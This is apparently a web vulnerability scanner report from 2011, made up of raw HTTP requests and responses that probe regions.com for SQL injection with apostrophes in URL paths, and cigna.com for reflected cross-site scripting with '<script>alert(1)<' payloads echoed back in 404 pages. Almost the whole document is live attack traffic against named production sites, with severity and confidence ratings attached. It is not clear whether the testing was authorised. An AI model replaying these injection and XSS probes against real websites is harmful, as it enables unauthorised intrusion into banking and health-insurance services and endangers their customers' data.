| GET /personal_banking'/email_starting_net.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 197 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /personal_banking''/email_starting_net.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_autoloan.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Set-Cookie: www.regions.com-http Date: Mon, 16 May 2011 15:21:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/get_started_autoloan.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:21:24 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_cds.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/get_started_cds.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:21:19 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_heloan.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/get_started_heloan.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:21:21 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_heloc.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/get_started_heloc.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:21:20 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_install Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/get_started_install Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:21:18 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/get | 
| GET /personal_banking'/get_started_lifegreen Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 209 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body> ...[SNIP]... | 
| GET /personal_banking''/get_started_lifegreen Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/loans | 
| GET /personal_banking'/loans_credit.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 191 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /personal_banking''/loans_credit.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/online | 
| GET /personal_banking'/online_banking_help.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:19:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 154 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://www.regions </body></html> | 
| GET /personal_banking''/online_banking_help.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:19:56 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 17340 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/online | 
| GET /personal_banking'/online_security.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:20:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 194 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /personal_banking''/online_security.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:20:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Tentative | 
| Host: | http://www.regions.com | 
| Path: | /personal_banking/open | 
| GET /personal_banking'/open_account.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /SiteError.aspx?aspxerrorpath= Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 191 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2fSiteError.aspx </body></html> | 
| GET /personal_banking''/open_account.rf HTTP/1.1 Host: www.regions.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 302 Found Set-Cookie: WWW.REGIONS.COM-HTTP Date: Mon, 16 May 2011 15:21:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /404.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 126 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f404.rf">here</a> </body></html> | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /favicon.ico | 
| GET /favicon.ico75b7d<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=173.193.214.243 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:36 GMT Content-type: text/html; charset=utf-8 Content-Length: 15705 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/favicon.ico75b7d<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /login_registration/index | 
| GET /login_registration53ee6<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:14 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/login_registration53ee6<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /login_registration/index | 
| GET /login_registration/index Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:19 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/login_registration ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites89d66<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:23 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites89d66<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkitef80a<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:29 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkitef80a<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:40 GMT Content-type: text/html; charset=utf-8 Content-Length: 15736 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkit/managers Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:46 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkit ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sitesf9a72<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:20 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sitesf9a72<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
| GET /sites/toolkitc9efd<script>alert(1)< Host: cigna.com Proxy-Connection: keep-alive Referer: http://cigna.com/sites User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 404 Not found Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:31:31 GMT Content-type: text/html; charset=utf-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <b>/sites/toolkitc9efd<script>alert(1)< ...[SNIP]... | 
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | /sites/toolkit/managers | 
